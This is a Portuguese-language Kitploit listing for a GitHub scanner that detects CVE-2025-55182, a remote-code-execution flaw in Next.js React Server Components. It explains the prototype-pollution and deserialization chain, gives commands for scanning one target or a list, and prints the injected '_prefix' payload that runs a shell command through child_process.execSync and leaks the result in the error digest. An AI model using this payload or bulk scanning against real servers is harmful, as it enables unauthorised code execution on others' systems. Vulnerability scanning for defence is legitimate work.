Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Scanner — Scanner de segurança para CVE-2025-55182 - Vulnerabilidade crítica de RCE em React Server Components | Kitploit
Ferramentas/GitHubGitHub/f0xyx/cve-2025-55182-scanner
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubf0xyx/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Scanner de segurança para CVE-2025-55182 - Vulnerabilidade crítica de RCE em React Server Components

Ver Repositório
11há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE‑2025‑55182 – Scanner de RCE por Desserialização RSC no Next.js

Esta ferramenta verifica se um alvo é vulnerável ao CVE‑2025‑55182, um bug de Execução Remota de Código causado pela manipulação insegura de payloads de modelo RSC (React Server Components) dentro do Next.js.
A vulnerabilidade encadeia Poluição de Protótipo → Abuso de Desserialização → Execução de JavaScript no Lado do Servidor.

Aviso: Use isto apenas em sistemas que você possui legalmente ou para os quais tem autorização explícita. Testes não autorizados = crime, mano.


🔥 Como Esta Vulnerabilidade Funciona

O Next.js processa internamente objetos especiais “modelo” enviados via multipart/form-data.
Se um atacante injeta uma estrutura maliciosa como um thenable forjado, ele pode envenenar:

  • __proto__
  • _response._prefix
  • constructor.constructor
  • e outros internos

Isso leva o servidor a avaliar JavaScript controlado pelo atacante, resultando em RCE completo.


📌 O Que Este Script Faz

  • Aceita uma URL única (-u) ou lista de alvos (-l)
  • Envia um payload multipart/desserialização criado
  • Extrai a saída do comando (id) do digest de erro do servidor
  • Salva hosts vulneráveis em foxvuln.txt

▶ Uso

URL Única

root@kitploit:~
python3 main.py -u https://alvo.com

Modo Lista

root@kitploit:~
python3 main.py -l lista.txt

📦 Visão Geral do Payload

O payload abusa de process.mainModule.require('child_process').execSync() via _prefix injetado:

root@kitploit:~
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",

Isso força o servidor a executar id e vazar o resultado dentro do digest lançado (porque erros RSC propositalmente retornam um campo “digest” estruturado).


🧪 Exemplo de Saída

Alvo vulnerável:

root@kitploit:~
[+] Testando: https://vitima.com
[VULN] usuário : uid=1000(www-data)

Não vulnerável:

root@kitploit:~
[+] Testando: https://seguro.com
[NOT VULN]

🗂 Arquivo de Saída

Todas as URLs confirmadas como vulneráveis são salvas em:

root@kitploit:~
foxvuln.txt

Formato:

root@kitploit:~
https://vitima.com => uid=1000(www-data)

🧠 Notas

  • Funciona apenas em endpoints que processam payloads de streaming RSC do Next.js
  • Não força rotas — assume que o host processa o POST em /
  • Timeout definido para 10s por host
  • Totalmente seguro para ambientes de laboratório — mas não execute isso em servidores aleatórios a menos que queira ganhar um recorde de crime federal

Baixar ferramenta